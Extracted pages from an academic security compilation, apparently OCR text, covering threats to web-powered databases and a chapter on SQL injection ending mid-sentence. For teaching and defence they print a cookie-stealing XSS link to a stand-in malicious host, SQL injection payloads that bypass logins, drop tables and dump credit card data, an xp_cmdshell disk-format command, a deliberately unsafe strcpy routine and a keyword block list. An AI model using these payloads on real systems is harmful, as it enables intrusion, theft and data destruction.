Thuraisingham, B. (2005). Privacy constraint processing in a privacy-enhanced database management system. Data & Knowledge Engineering, 55, 159-188.
Denning (1982). Cryptography and Data Security. Addison-Wesley.
Osborn, S., Sandhu, R.S., Munawer, Q. (2000). Configuring role-based access control to enforce
2107
Database Security and Statistical Database Security
mandatory and discretionary access control policies. ACM Transaction on Information and System Security, 3(2),85–206.
KEY TERMS Availability: A system or service is available to authorized users. CIA: Confidentiality, integrity, availability; the most basic security requirements.
Confidentiality: Only authorized subjects should have read access to information. DWH: Data warehouse ETL: The process of Extracting, Transforming (or Transporting) and Loading source data into a DWH. Integrity: No unauthorized modifications or modifications by unauthorized subjects are made. OLAP: Online Analytical Processing
This work was previously published in Encyclopedia of Data Warehousing and Mining, Second Edition, edited by J. Wang, pp. 610-616, copyright 2009 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
2108
2109
Chapter 7.8
Security Threats in Web-Powered Databases and Web Portals Theodoros Evdoridis University of the Aegean, Greece Theodoros Tzouramanis University of the Aegean, Greece
INTRODUCTION It is a strongly held view that the scientific branch of computer security that deals with Web-powered databases (Rahayu & Taniar, 2002) than can be accessed through Web portals (Tatnall, 2005) is both complex and challenging. This is mainly due to the fact that there are numerous avenues available for a potential intruder to follow in order to break into the Web portal and compromise its assets and functionality. This is of vital importance when the assets that might be jeopardized belong to a legally sensitive Web database such as that of an enterprise or government portal, containing sensitive and confidential information. It is obvious that the aim of not only protecting against, but mostly preventing from potential malicious or accidental activity that could set a Web portal’s asset in danger, requires an attentive examina-
tion of all possible threats that may endanger the Web-based system.
BACKGROUND Security incidents have been bound to the Internet since the very start of it, even before its transition from a government research project to an operational network. Back in 1988, the ARPANET, as it was referred to then, had its first automated network security incident, usually referred to as “the Morris worm.” A student at Cornell University (Ithaca, NY), Robert T. Morris, wrote a program that would connect to another computer, find and use one of several vulnerabilities to copy itself to that second computer, and begin to run the copy of itself at the new location (CERT Coordination Center Reports, 2006). In 1989, the ARPANET of-
Security Threats in Web-Powered Databases and Web Portals
ficially became the Internet and security incidents employing more sophisticated methods became more and more apparent. Among the major security incidents were the 1989 WANK/OILZ worm, an automated attack on VMS systems attached to the Internet, and exploitation of vulnerabilities in widely distributed programs such as the sendmail program (CERT Coordination Center Reports, 2006). However, without underestimating the impact that such incidents of the past had to all involved parties, analysts support that the phenomenon has significantly escalated not only with respect to the amount of incidents but mostly to the consequences of the latter. The most notorious representative of this new era of cyber crime is the CardSystems incident (Web Application Security Consortium, 2006). In that crime scheme, hackers managed to steal 263,000 credit card numbers, expose 40 million more and proceed to purchases worth several million dollars using these counterfeit cards. CardSystems is considered by many the most severe publicized information security breach ever and it caused company shareholders, financial institutes and card holders damage of millions of dollars. The latest security incident occurred on April 25, 2006 when a hacker successfully managed to abuse a vulnerability in the Horde platform to penetrate the site owned by the National Security Agency of the Slovak Republic, jeopardizing sensitive information (Web Application Security Consortium, 2006).
LEGALLY SENSITIVE WEB-POWERED DATABASES Even though legally sensitive portals, in other words, Web portals containing legally sensitive data, have been included in the Web portal family no sooner than the late 1990s (Wikipedia.org, 2006), the specific addition signaled the begin-
2110
ning of a new era in the Web portal scientific field. More specifically, portals took a converse approach with respect not only to the nature of services that they offered but also to the target group to which these services were offered. The end user from the perception of the Web portal was no longer exclusively the anonymous user, but could also be a very specific individual whose personalization data were frequently hosted inside the portal itself. These types of portals, while often operating like ordinary Web portals serving millions of unaffiliated users, utilised some of its privately accessed aspects to harmonise the communications and work flow inside the corporation. This innovative approach proved to be both a money and labour saving initiative (Oracle Corporation, 2003). On the other hand, government portals that aimed at supporting instructing and aiding citizens to various socially oriented activities proved to be an important step towards the information society era. It is obvious that these kinds of portals playing such an important role in the social or the enterprise context could not operate without information of equivalent potential and importance. As a result, the aforementioned Web portals were powered by databases hosting information of extreme fragility and sensitivity, a fact that inescapably attracted various nonlegitimate users, driven by ambition, challenge, or malice and who aimed to compromise the information, mangling the Web portal and making it non-operational. To impede all possible attacks against the Web portal and the hosted information, it is considered wise to identify all possible actions that could threaten and distort their functionality. The most ordinary Web portal architecture is examined and a threat area is defined, partitioned into four different sections, every one of which relates to a corresponding point of breaking-into the Web portal’s normal operation.
Security Threats in Web-Powered Databases and Web Portals
System’s Architecture
THREATS
Web portals of all types have been designed to take advantage of a Web server and, through it, to retrieve all data hosted in a database which in turn is accessed by a database server (Microsoft Corporation, 2003). The term “Web application” is commonly used to represent the set of servers the combined operation of which is perceived as the service requested by the end user. An application of this philosophy is usually called a three-tier application, that is, the database tier that contains the database server and is responsible for writing data in and out of the database; the Web tier where the Web server is found and it is accountable for establishing connections and data transmission with the database server; and the client tier in which the leading role is played by the client’s Web browser, that is an interface which allows the user to receive an answer to her/his request from the Web portal. From a protocol point of view, communications between the client and the Web server are labeled under the HTTP protocol. On the other hand, communication between the Web and database server is achieved through the application programming interface ODBC. This architecture is illustrated by the diagram in Figure 1.
Information hosted in, and distributed by, a Web portal, not necessarily legally sensitive, during a transaction session between the end user and the organization’s systems, flows back and forth from client through the network, usually the Internet, to the organization’s respective server or servers that constitute the Web portal. A precondition for the latter’s undisturbed and optimal operating is the absolute protection of the information both stored and in propagating form (Splain, 2002). Protecting a legally sensitive portal requires ensuring that no attack can take place on the database server, the Web server, the Web application, the external network and the underlying operating systems of the host computers.
Network Level Threats The most important network level threat for the Web-powered database server and for the Web portal’s operation is sniffing (Splain, 2002). Sniffing is the act of capturing confidential information such as passwords, using special hardware and/or software components that are transmitted through an unsafe external network such as the Internet.
Figure 1. Three-tier architecture Tier 1
ODBC Communication
HTTP Communication Client
Tier 3
Tier 2
External Network
Web Server
Internal Network
Database Server
2111
Security Threats in Web-Powered Databases and Web Portals
Another significant threat is the so-called spoofing attack (Zdnet.com, 2002). This form of attack aims at hiding the true identity of a computer system in the network. Utilising this form of attack, a malicious individual can use as her/his own IP address that belongs to a legitimate user’s computer in order to gain unauthorised access to the Web portal’s resources. An equally significant threat is the so-called session high-jacking (Zdnet.com, 2002) or the man-in-the-middle attack. Through this technique, the Web server is deceived, accepting information flow from an unauthorised system, and wrongfully transmitting the information derived from the database to this system. A last kind of attack is tampering. This attack implies capturing and transmitting a fake to the original message or transforming the transmitted item through the network data into a noncompressible form with respect to the authorised receiver.
Host Level Threats One of the most common threats performed at host level is the virus threat. A virus is a computer program that is designed to perform malicious acts and corrupt a computer system’s operating system, or other applications, exploiting bugs found throughout these programs. There are various breeds of viruses, like Trojan horses which are programs that are considered harmless and the malicious code is transparent to a non-extensive inspection, and worms which in turn are viruses which enjoy the property to duplicate themselves from one computer system to another, using the shared network. Another crucial form of threat is the denial of service threat. This threat aims at ceasing any of the Web portals operational components from functioning. Common methods for achieving a denial of service (Wikipedia.org, 2006) status are releasing a virus on a host computer, sending a huge amount of ICMP requests (ping of death) to
2112
the host, or using special software to perform a thousand HTTP requests for resources per second on the Web server (SYN-Flood). An important threat is the unauthorised direct access to the Web portal’s hosts. Insufficient access control mechanisms may allow a nonregistered user to gain access to the operating system’s resources, a fact that may expose information of critical importance. An example is the Windows operating system that stores SQL Server’s security parameters in the systems registry file. Additionally an attacker taking advantage of careless configuration of the database server may perform direct queries causing it significant problems. Many RDBMS software systems include default accounts that administrators disregard to deactivate, allowing attackers to gain easy access to the database.
Application Level Threats One of the most vital parts of a Web application is the one that accepts user-entered data. Threats in this specific category exist when the attacker realizes that the application generates unreliable assumptions regarding the size and type of userinserted data (Oppliger, 2002). In the context of this category of threats, the attacker inserts specific input in order to force the application to achieve her/his purpose. A common threat of this category is the buffer overflow threat. When a threat of this kind is aimed, it gives the opportunity to the attacker to launch a denial-of-service attack, neutralizing the computer that runs the Web application. The following example depicts a faulty routine that copies a user-entered username to buffer for further processing. The function depicted in Figure 2 receives user input and copies its contents to a character array capable of storing input up to 10 characters. This character array represents an application container to store this input for further processing. The problem lies in the fact that the application copies user input to the container, without prior
Security Threats in Web-Powered Databases and Web Portals
Figure 2. A faulty routine for copying user entered data void a_function(char *username) { char buffer[10]; strcpy(buffer,username); /* input is copied to buffer without prior checking its size */ }
examination with respect to input size. In this case, if this input exceeds 10 characters in length, a buffer overflow event will occur. One of most dangerous threats to the Web security community is cross-site scripting, also known as XSS (Morganti, 2006). It is an attack technique that forces a Web site to echo clientsupplied data, which executes in a user’s Web browser. When a user is cross-site scripted, the attacker will have access to all Web browser content (cookies, history, application version, etc.). Cross-site scripting occurs when an attacker manages to inject script code such as javascript or vbscript into a Web site causing it to execute the code. Usually this is done by employing a specially crafted link and sending it, explicitly via e-mail or implicitly by posting it to a forum, to an unsuspecting victim. Upon clicking the malicious link, a piece of script code embedded in it could be executed. Imagine that an attacker has a potential victim in mind and she\he knows that the victim is on a shopping portal. This Web site allows users to have an account where they can automatically buy things without having to enter their credit card details every time they wish to purchase something. Furthermore, in order to be user friendly, the portal uses cookies to store user credentials so that the user must not enter a username and a password for each resource requested during a session. The attacker knows that if she\he can get the user’s cookie, she\he would
be able to buy things from this online store using the victim’s credit card. Then she\he constructs the link that appears in Figure 3. The user would of course click the link and they would be led to the CNN News Article, but at the same time the attacker would of been able to also direct the user towards her/his specially crafted URL “http://malicious_site.com” and specifically at the steal.cgi Web page which is constructed to receive as an argument “document.cookie,” the user’s cookie, and save it in the attacker’s computer. The attacker now refreshes the page and has access to the victim’s account and the victim is billed with everything the attacker might buy. Another common threat is known as SQL injection (Spett, 2002) that takes place on the database layer of the Web application. Its source is the incorrect escaping of dynamically-generated string literals embedded in SQL statements that are dynamically generated, based on user input. Assume that the following code is embedded in an application. The value of the variable username is assigned from a user input parameter—for example, the value of an HTTP request variable or HTTP cookie. The code that appears in Figure 4 naively constructs a SQL statement by appending the user-supplied parameter to a SELECT statement. If the input parameter is manipulated by the user, the SQL statement may do more than the
2113
Security Threats in Web-Powered Databases and Web Portals
Figure 3. A maliciously crafted link for capturing user cookie Check this Article Out!
Figure 4. A carelessly written statement for creating dynamic SQL statements
query = “ SELECT * FROM users WHERE name= ‘ “+username+” ‘ “;
Figure 5. An exploited statement that forces indirectly the SQL engine to drop a database table
query = “ SELECT * FROM users WHERE name= ‘whatever’; DROP TABLE users;--’ “;
code author intended. For example, if the input parameter supplied is whatever’; DROP TABLE users;--, the SQL statement that appears in Figure 5 would be built by the code of Figure 4. When sent to the database, this statement would be executed and the “users” table will be removed. Another vital part that represents the database and the Web portal is the “authentication authorization.” Depending on the Web application, various authentication mechanisms are employed and utilised. Nevertheless, if an authentication schema is not properly selected and applied, it can lead to significant problems. One threat that belongs to this group is the utilisation of weak credentials. Even though many systems store the
2114
cipher versions of passwords as generated by a hash function in the database, using a sniffing attack to capture the crypto version of the password and performing an off-line brute force attack supported by appropriate computer power and one or more dictionaries, could most likely lead to the retrieval of the users password. A threat that also falls into this category is the “cookie replay attack.” Here, the attacker captures the authorization cookie of a legitimate user that is used for the user to access all the portal’s resources without submitting its credentials every time she\he requests access to a new resource, and supplies it afterwards to bypass the authentication procedure.
Security Threats in Web-Powered Databases and Web Portals
Physical and Insider Threats
CONCLUSION
This group of threats is often wrongfully underestimated with dramatic results (Tipton & Krause, 2004). Physical attacks occur when people illegally break inside the vendor’s facilities and gain access to the computers that compose the legally sensitive portal. If this takes place and the malicious user manages to stand side by side with the host computer, no security scheme on earth can deter the violation that could range from physical destruction of the computer, to stealing data and opening backdoors for later remote access. Apart from that, insider attacks performed by assumed trusted personnel are more difficult to prevent as some specific employers enjoy the privilege of having to overcome much fewer obstacles in order to get their hands, or the hands of an external accomplice, on the portal’s resources.
Legally sensitive Web-powered databases and portals represent a great asset in all conceivable aspects of the social and the commercial world. With a range varying from multinational enterprises to local organizations and individuals, this specific category comprises the epicentre of worldwide interest. The problem lies in the fact that this interest isn’t always legitimate. The fulfilment of malicious operations that can lead to breaking-in the portal’s assets cover a broad range of possibilities from a minor loss of time in recovering from the problem and relevant decrease in productivity to a significant loss of money and a devastating loss of credibility. Furthermore, considering that no one on the Internet is immune, it is obvious that it is of utmost importance to persevere with the task of achieving the security of a system containing sensitive information.
FUTURE TRENDS REFERENCES According to scientific estimations, more than 100,000 new software vulnerabilities will be discovered by 2010 (Iss.net, 2005). This can be translated as the discovery of one new bug every five minutes of every hour of every day until then. As programs and applications get more sophisticated and provide more advanced features, their complexity will increase likewise. Experts also estimate that in the next five years the Microsoft Windows operating system will near 100 million lines of code and the software installed in an average user’s computer will contain a total of about 200 million lines of code and, within it, 2 million bugs. Adding to the fact that another half a billion people will join the number of Internet users by that year and that a not negligible number of these will be malicious users, the future is worrying.
CERT Coordination Center Reports (2006). Security of the Internet. Retrieved January 8, 2007, from http://www.cert.org/encyc_article/ tocencyc.html Iss.net (2005). The future landscape of Internet security according to Gartner.inc. Retrieved January 8, 2007, from http://www.iss.net/resources/pescatore.php Microsoft Corporation (2003). Improving Web application security: Threats and countermeasures. Microsoft Press. Morganti, C. (2006). XSS attacks FAQ. Retrieved January 8, 2007, from http://astalavista.com/media/directory06/uploads/xss_attacks_faq.pdf Oppliger, R. (2002). Security technologies for the World Wide Web (2nd ed.). Artech House Publishers.
2115
Security Threats in Web-Powered Databases and Web Portals
Oracle Corporation (2003). Transforming government: An e-business perspective (Tech. Rep.). Retrieved January 8, 2007, from http://www. oracle.com/industries/government/ Gov_Overview_Brochure.pdf Rahayu, J. W., & Taniar, D. (2002). Web-powered databases. Hershey, PA: Idea Group Publishing. Spett, K. (2002). SQL injection: Is your Web application vulnerable? (Tech. Rep.). SPI Dynamics Inc. Splain, S. (2002). Testing Web security assessing the security of Web sites and applications. Wiley. Tatnall, A. (2005). Web portals: The new gateways to Internet information and services. Hershey, PA: Idea Group Reference. Tipton, H. F., & Krause, M. (2004). Information security management handbook (5th ed.). Boca Raton, FL: CRC Press. WBDG.org (2005). Provide security for building occupants and assets. Retrieved January 8, 2007, from http://www.wbdg.org/design/provide_security.php Web Application Security Consortium. (2006). Retrieved January 8, 2007, from http://www. webappsec.org/projects/whid/list_year_2006. shtml Wikipedia.org. (2006). Retrieved January 8, 2007, from http://en.wikipedia.org/wiki/Main_Page Zdnet.com. (2002). Database security in your Web enabled apps. Retrieved January 8, 2007, from http://www.zdnet.com.au/builder/architect/database/story/0,2000034918,20268433,00.htm
KEY TERMS Advanced Research Projects Agency Network (ARPANET): It was the world’s first operational packet switching network, and the progenitor of the Internet. It was developed by the U.S. Department of Defense. Cookie: It is a small packet of information stored on users’ computers by Web sites, in order to uniquely identify the user across multiple sessions. Cybercrime: It is a term used broadly to describe criminal activity in which computers or networks are a tool, a target, or a place of criminal activity. Database: It is an organized collection of data (records) that are stored in a computer in a systematic way, so that a computer program can consult it to answer questions. The database model in most common use today is the relational model which represents all information in the form of multiple related tables, every one consisting of rows and columns. Database Server: It is a computer program that provides database services to other computer programs or computers, as defined by the client-server model. The term may also refer to a computer dedicated to running such a program. Horde: It is a PHP-based Web Application Framework that offers a broad array of applications. These include for example a Web-based e-mail client, a groupware (calendar, notes, tasks, file manager), a Web site that allows users to add, remove, or otherwise edit and change all content very quickly and a time and task tracking software. Internet Control Message Protocol (ICMP): It is one of the core protocols of the Internet
2116
Security Threats in Web-Powered Databases and Web Portals
Protocol Suite. It is chiefly used by networked computers’ operating systems to send error messages, indicating for instance that a requested service is not available or that a host or router could not be reached. Sendmail: It is a mail transfer agent (MTA) that is a well known project of the open source
and Unix communities and is distributed both as free and proprietary software. Web Server: It is a computer program hosted in a computer that is responsible for accepting HTTP requests from clients, which are known as Web browsers, and serving them Web pages, which are usually HTML documents.
This work was previously published in Encyclopedia of Portal Technologies and Applications, edited by A. Tatnall, pp. 869-874, copyright 2007 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
2117
2118
Chapter 7.9
SQL Code Poisoning:
The Most Prevalent Technique for Attacking Web Powered Databases Theodoros Tzouramanis University of the Aegean, Greece
ABSTRACT This chapter focuses on the SQL code poisoning attack. It presents various ways in which a Web database can be poisoned by malicious SQL code, which can result in the compromise of the system. Subsequently, techniques are described for the detection of SQL code poisoning and a number of lockdown issues that are related to this type of attack are discussed. This chapter also reviews security mechanisms and software tools that protect Web applications against unexpected data input by users; against alterations of the database structure; and against the corruption of data and the disclosure of private and confidential information, all of which are owed to the susceptibility of these applications to this form of attack.
INTRODUCTION Web application attacks are continuously on the rise, posing new risks for any organization that
have an “online presence.” The SQL code poisoning or SQL injection attack (CERT, 2002) is one of the most serious threats faced by database security experts. Today it is the most common technique used for attacking, indirectly, Web powered databases and disassembling effectively the secrecy, integrity, and availability of Web applications. The basic idea behind this insidious and pervasive attack is that predefined logical expressions within a predefined query can be altered by simply injecting operations which always result in true or false statements. With this simple technique, the attacker can run arbitrary SQL queries and thus they can extract sensitive customer and order information from e-commerce applications, or they can bypass strong security mechanisms and compromise the backend databases and the file system of the data server. Despite these threats, a surprisingly high number of systems on the Internet are totally vulnerable to this attack. This chapter focuses on the SQL code poisoning attack. It presents various ways in which a Web database can be poisoned by malicious SQL
code, which can result in the compromise of the system. Subsequently, techniques are described for the detection of SQL code poisoning and a number of lockdown issues that are related to this type of attack are discussed. This chapter also reviews security mechanisms and software tools that protect Web applications against unexpected data input by users; against alterations of the database structure; and against the corruption of data and the disclosure of private and confidential information, all of which are owed to the susceptibility of these applications to this form of attack.
In order to be able to perform SQL code poisoning hacking, all an attacker needs is a Web browser and some guess work to find important table and field names. This is why SQL code poisoning is one of the most common application layer attacks currently being used on the Internet. The inventor of the attack is the Rain Forest Puppy, a former hacker and, today, a security advisor to international companies of software development.
THE SQL CODE POISONING ATTACK SQL Code Poisoning Principles
BACKGROUND Online businesses and organizations are protected these days by some kind of software or hardware firewall solution (Theriault & Newman, 2001). The purpose of the firewall is to filter network traffic that passes into and out of the organization’s network, limiting the use of the network to permitted, “legitimate” users. One of the conceptual problems with relying on a firewall for security is that the firewall operates at the level of IP addresses and network ports. Consequently, a firewall does not understand the details of higher level protocols such as hypertext transfer protocol, that is, the protocol that runs the Web applications. There is a whole class of attacks that operate at the application layer and that, by definition, pass straight through firewalls. SQL code poisoning is one of these attacks. It takes advantage of nonvalidated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database, that is, the heart of most Web applications. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. Therefore, the attacker can execute malicious SQL queries on the backend database server through the Web application.
SQL code poisoning is a particularly insidious attack since it transcends all of the good planning that goes into a secure database setup and allows malicious individuals to inject code directly into the database management system (DBMS) through a vulnerable application (Spett, 2002). The basic idea behind this attack is that the malicious user counterfeits the data that a Web application sends to the database aiming at the modification of the SQL query that will be executed by the
Figure 1. A typical user login form in a Web application
2119
SQL Code Poisoning
DBMS. This falsification seems harmless at first glance but it is actually exceptionally vicious. One of the most worrying aspects of the problem is that successful SQL code poisoning is very easy to accomplish, even if the developers of Web applications are aware of this type of attack. Web programming languages vulnerable to SQL code poisoning attack are the dynamic script languages ASP, ASP.NET, PHP, JSP, CGI, and so forth (Anupam & Mayer, 1998). Imagine for example, the typical user and password entry form of a Web application that appears in Figure 1. When the user provides their credentials, an ASP (Active Server Page) code similar to the one that appears in Figure 2 might undertake the production of the SQL query that will certify the user’s identity. In practice, when the user types a combination of valid login name and password the application will confirm the elements by submitting a relative SQL query in some table USERS with two columns: the column username and the column password. The most important part of the code of Figure 2 is the line:
str_query = “select * from USERS where username = ” “ + text_username +” ‘ and password = ’ “ + text_password + ” ‘ “;
The query is sent for execution into the database. The values of the variables text_username and text_password are provided by the user. For example, if the user types: username: george password: 45dc&vg3
the SQL query that is produced is the: select * from USERS where username = ‘george’ and password = ‘45dc&vg3’;
which means that if this pair of username and password is stored in the table USERS, the authentication is successful and the user is inserted in the private area of the Web application. If however the malicious user types in the entry form the following unexpected values:
Figure 2. An ASP code example that manages the users’ login requests in a database through a Web application
2120
SQL Code Poisoning
username: george
Poisoning the URL
password: anything’ or ‘1’ = ‘1’
then the dynamic SQL query is the: select * from USERS where username = ‘george’ and password = ‘anything’ or ‘1’ = ‘1’;
The expression “1”=“1” is always true for every row in the table, and a true expression connected with “or ” to another expression will always return true. Therefore, the database returns all the tuples of the table USERS. Then, provided that the Web application received, for an answer, certain tuples, it concludes that the user’s password is “anything” and permits their entry. In the worst case the Web application presents on the screen of the malicious user all the tuples of the table USERS, which is to say all the usernames with their passwords. If the malicious user knows the whole or part of the login name of a user, they can log on without knowing their password, by entering a username like in the following form:
An SQL code poisoning attack can also be performed by using URL parameters. When a user enters the URL http://www.mywebapplication. com/products.asp?Pid=158, an SQL query similar to the following is executed: select Pname, Pdetails from PRODUCTS where PID = 158
An attacker may abuse the fact that the PID parameter is passed to the database without sufficient validation by manipulating the parameter’s value to build malicious SQL statements. For example, setting the value “158 or 1=1” to the PID variable may result in the following URL: h t t p : / / w w w. m y w e b a p p l i c a t i o n . c o m / p r o d u c t s . asp?Pid=158%20or%201=1
Each “%20” in the URL represents a URLencoded space character, so the URL actually looks like this:
username: ‘ or username = ‘admin’; -password:
h t t p : / / w w w. m y w e b a p p l i c a t i o n . c o m / p r o d u c t s . asp?Pid=158 or 1=1
The “--” sequence begins a single-line comment in transact-SQL, so in a Microsoft SQL server environment everything after that point in the query will be ignored. By similar expressions the malicious user can change a user’s password, drop the USERS table, create a new database: they can effectively do anything they can express as an SQL query that the Web application has the privilege of doing, including running arbitrary commands, creating and running DLLs within the DBMS process, shutting down the database server, or sending all the data off to some server out on the Internet.
The corresponding SQL statement is: select Pname, Pdetails from PRODUCTS where PID = 158 or 1=1
This condition would always be true and all Pname and Pdetails products’ pairs are returned. The attacker can manipulate the application even further by inserting malicious commands. For example, in the case of Microsoft SQL server, an attacker can request the following URL, targeting the name of the products table:
This would produce the following error in the Web browser: Column ‘PRODUCTS.PID’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /products.asp, line 22
Now that the attacker knows the name of the products table (‘PRODUCTS’) they can modify its contents or drop the entire table by calling up the following URL in the browser: http://www.mywebapplication.com/products.asp?Pid=15 8;%20drop%20table%20PRODUCTS
An attacker may use SQL code poisoning to retrieve data from other tables as well. This can be done using the SQL “union select ” statement. This statement allows the chaining of the results of two separate SQL select queries. For example, an attacker can request the following URL: http://www.mywebapplication.com/products.asp?Pid=15 8%20union%20select%20number,%20expires_end%20f rom%20CREDITCARDS%20where%20type=‘visa’
seeking for the execution of the following SQL query: select Pname, Pdetails from PRODUCTS where PID = ‘158’ union select number, expires_end from CREDITCARDS where type=‘visa’;
The result of this query is a table with two columns, containing the results of the first and second queries, respectively.
2122
Advanced SQL Code Poisoning Techniques Amongst more advanced methods used to gain access to Web powered databases is the method of extracting information using time delays. The basic idea is that the attacker can make the SQL query that the database server is in the process of executing, pause for a measurable length of time in the middle of execution, on the basis of some criteria. The attacker can therefore issue multiple (simultaneous) queries via SQL code poison, through the Web application into the database server and extract information by observing which queries pause, and which do not. This technique was used in a practical demonstration across the Internet and achieved with a satisfactory degree of reliability a bandwidth of about 1 byte per second (Andrews, Litchfield, Grindlay, & NGS Software, 2003). This technique is a real, practical, but low bandwidth method of extracting information out of the database. Also, if SQL code poisoning vulnerability is present in a Web application, the attacker has a wealth of possibilities available to them in terms of system-level interaction. The extended stored functions and procedures provide a flexible mechanism for adding functionality to the DBMS. The various built-in extended functions and procedures allow the database server administrator (DBA) to create scripts that interact closely with the operating system. For example, the extended stored procedure xp_cmdshell executes operating system commands in the context of Microsoft SQL Server (Cerrudo, 2004; Peikary & Fogie, 2003). These functions can be used by an attacker to perform any administrative task on a machine, including administration of the operating system’s active (users) directory, the registry, the Web and data server itself.
SQL Code Poisoning
Protection from SQL Web Hacking The great popularity and success of the SQL code poisoning attack is based on the fact that malicious users post the attack against the database by using legal entry forms of the Web application. The simplest solution to counter this attack is to check the user’s entry for the existence of single quotes in the strings that they type. As was shown from the examples discussed, the majority of code poisoning attacks require the use of single quotes to terminate an expression. However, in
Figure 3. A simple function that filters and removes all single quotes from the data which have been inserted by the user function escape( input ) input = replace(input, " ' ", ""); escape = input; end function;
many applications, the developer has to side step the potential use of the apostrophe as a way to get access to the system by performing a string replace on the input given by the user. This is useful for valid reasons, for example, for being able to enter surnames such as “O’Hara” or “M’Donalds.” By using simple replace functions such as the ones appearing in Figure 3 which remove all single quotes (or even convert all single quotes to two single quotes), the chance of an code poisoning attack succeeding is greatly reduced. As shown earlier in this chapter, certain characters and character sequences such as “select,” “where,” “from,” “insert,” “xp _,” and “;” can be used to perform an SQL code poisoning attack. By removing these characters and character sequences from the user input before building a query (see for example the validate_string() function in Figure 4a, we can help reduce the chance of a code poisoning attack even further. So if the attacker runs the query: select Pname from PRODUCTS where Pid=158; xp_cmdshell ‘format c: /q /yes ‘; drop database SYSTEM; --
Figure 4. Functions that (a) identify and remove all known bad entry that can be inserted by the user or (b) identify the “permitted” characters of their input and gives permission to those characters only
function validate_string( input ) known_bad = a rray( " select", " insert", "update", " delete", " drop", “ shutdown", "--", " ' " ); validate_string = true; for i = l bound( k nown_bad ) to ubound( known_bad ) if ( i nstr( 1, i nput, k nown_bad(i), vbtextcompare ) 0 ) then { validate_string = false; exit function; } end function;
function validate_password( input ) good_password_chars = "abcdefghijkl mnopqrstuvwxyzABCDEFGH IJKLMNOPQRSTUVWXYZ0123456789 ~@#$%^*(){}[],.?" validate_password = true; for i = 1 to len( input ) { c = mid( input, i, 1 ) if ( InStr( good_password_chars, c ) = 0 ) then { validate_password = false; } exit function; }; end function;
(a)
(b)
2123
SQL Code Poisoning
and runs it through a Microsoft SQL Server environment, it would end up looking like this: Pname PRODUCTS Pid=158 cmdshell ‘’format c: /q /yes ‘’ database SYSTEM
which is basically useless, and will return no records from the SQL query. In this method some attention needs to be made to avoid false rejects and thus to reject strings that might seem dangerous but they appear in legitimate input, as for example the word “fromage” (cheese) whose first four characters form the harmful keyword “from.” Therefore an additional check whether an input has the correct format can be performed by using regular expressions. However, while a few troublesome characters can be easily “disallowed,” this approach is less than optimal for two reasons: First, a character that is useful to attackers might be missed, and second, there is often more than one way of representing a bad character. For example, an attacker may be able to escape a single quote so that the validation code misses it and passes the escaped quote to the database, which treats it the same way as a normal single quote character. Therefore, a better approach is depicted in Figure 4b where the validate_password() function identifies the “permitted” characters of the user’s entry and gives permission to those characters only. This approach requires more work but ensures a much tighter control on input. A more secure solution would combine the two functions that appear in Figure 4 by investigating for dangerous strings after the filtering for allowable characters. Regardless of which approach will be followed, limiting the permitted length of the user’s entry is essential because some SQL code poisoning attacks require a large number of characters. Also if the Web application needs to accept a query string value for a product ID or the like, a function (such as the IsNumeric() function for ASP) is always needed, which checks whether the value is actually numeric. If the value is not
2124
numeric, then either an error or redirection of the user to another page is suggested, where they can choose a product. Yet again, always posting the forms with the method attribute set to POST is required, in order to prevent smart users from getting ideas—as they might, if they see form variables tacked onto the end of the URL. Regarding the connection to the database, one of the practices that have to be avoided is the use of a database account with DBA’s privileges. A user with DBA’s privileges is allowed to do anything in the DBMS: creating logins and dropping databases are just two possibilities. It is sufficient to say that it is a very bad idea to use the DBA (or any high-privileged account) for application database access. It is much better to create a limited access account and use that instead. This account may run with permitted access to reading the tables of the database only (Breidenbach, 2002). To further reduce the risk of an SQL code poisoning attack, all technical information from client-delivered error messages has to be removed. Error messages often reveal technical details that can enable an attacker to discover vulnerable entry points. It remains an open question whether the problem with SQL code poisoning attacks is the input or the output provided and one should therefore also filter the output. Also unused stored procedures or triggers or user-defined functions need to be removed. Finally, the last but not least important security measure is the encryption of sensitive stored information. Even if the attacker somehow managed to break through the defense, the sensitive information in the database needs to remain secret, and thus, encrypted. Candidates for encryption include user personal information, user log-in details, financial information such as credit card details, and so forth.
Software Tool Solutions One way of checking whether a Web application is vulnerable to SQL code poisoning attacks is
SQL Code Poisoning
with the use of specialized software, which is able to automatically scan the entire Web application for vulnerabilities to SQL code poisoning. This software will indicate which URLs or scripts are vulnerable to SQL code poisoning attack so that the developer can fix the vulnerability easily. Besides SQL code poisoning vulnerabilities, a Web application scanner may also check for cross-site scripting and other Web vulnerabilities. In order to check if the SQL statement execution is authorized or not, a proxy server is needed to get the SQL statement that is being executed. To check if a SQL statement is allowed, the proxy driver will normalize the SQL statement, and search to determine whether this statement already exists in a ready-sorted list. If the normalized SQL statement does exist, the SQL execution will be allowed only if the variables are within their expected values. If the normalized SQL statement is not in the permitted list, the system checks against another user supplied list of regular expressions. If the normalized SQL statement does not match any regular expression on this list, the SQL execution will be blocked. This semisecure architecture is illustrated in Figure 5 and allows the system to handle exceptional cases that might not be compatible with current algorithm of variable normalization. Since system checks against the regular expression list after variable normalization, attackers should not be able to bypass the authorization process. And since most SQL statements do not need to be matched against
the regular expression, performance impact should be minimal. Finally, there are automatic tools that protect from SQL code poisoning by randomizing the SQL statement, creating instances of the language that are unpredictable to the attacker (Boyd & Keromytis, 2004). They also run as proxy servers.
FUTURE TRENDS There are still a variety of problems to be solved in order to come up with a system that can support the full range of potential applications from SQL code poisoning attacks in a secure fashion. The most notable omission in the list of solutions was an answer to the question of how to support multithreaded applications. We are not aware of any system tool that has addressed this problem. Another important improvement is to provide network-based intrusion detection tools (Axelsson, 2000; Wagner & Dean, 2001) with the ability to detect all known types of SQL code poisoning attacks, both at HTTP protocol layer or database connection (Mookhey & Burghate, 2003).
CONCLUSION SQL code poisoning attacks are a serious concern for Web application developers as they can be used to break into supposedly secure systems and steal,
Figure 5. A semi-secure architecture for protection from SQL code poisoning attacks
SQL code proxy server client
poisoning examination center (middleware)
original data server
2125
SQL Code Poisoning
